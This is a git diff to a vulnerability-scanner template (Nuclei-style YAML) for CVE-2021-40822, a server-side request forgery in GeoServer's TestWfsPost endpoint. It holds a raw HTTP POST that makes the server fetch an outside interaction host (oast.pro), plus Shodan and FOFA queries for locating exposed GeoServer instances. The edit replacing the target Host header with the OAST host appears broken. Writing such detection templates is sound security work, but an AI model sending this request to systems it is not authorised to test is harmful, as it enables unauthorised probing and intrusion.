diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml
index 0888e11fad..ca439dd319 100644
--- a/http/cves/2021/CVE-2021-40822.yaml
+++ b/http/cves/2021/CVE-2021-40822.yaml
@@ -2,7 +2,7 @@ id: CVE-2021-40822
 
 info:
   name: Geoserver - Server-Side Request Forgery
-  author: For3stCo1d
+  author: For3stCo1d,aringo-bf
   severity: high
   description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows server-side request forgery via the option for setting a proxy host.
   reference:
@@ -19,29 +19,31 @@ info:
     epss-score: 0.65495
   metadata:
     max-request: 1
-    fofa-query: app="GeoServer"
     verified: true
+    shodan-query: title:"GeoServer"
+    fofa-query: app="GeoServer"
   tags: cve,cve2021,ssrf,geoserver
 
 http:
   - raw:
       - |
         POST /geoserver/TestWfsPost HTTP/1.1
-        Host: {{Hostname}}
+        Host: {{oast.pro}}
         Content-Type: application/x-www-form-urlencoded
 
-        form_hf_0=&url=http://{{interactsh-url}}/geoserver/../&body=&username=&password=
+        form_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password=
 
     matchers-condition: and
     matchers:
       - type: word
-        part: interactsh_protocol # Confirms the HTTP Interaction
+        part: body
         words:
-          - "http"
+          - "<b>Interactsh</b>"
 
       - type: word
+        part: header
         words:
-          - "<html><head></head><body>"
+          - "text/html"
 
       - type: status
         status: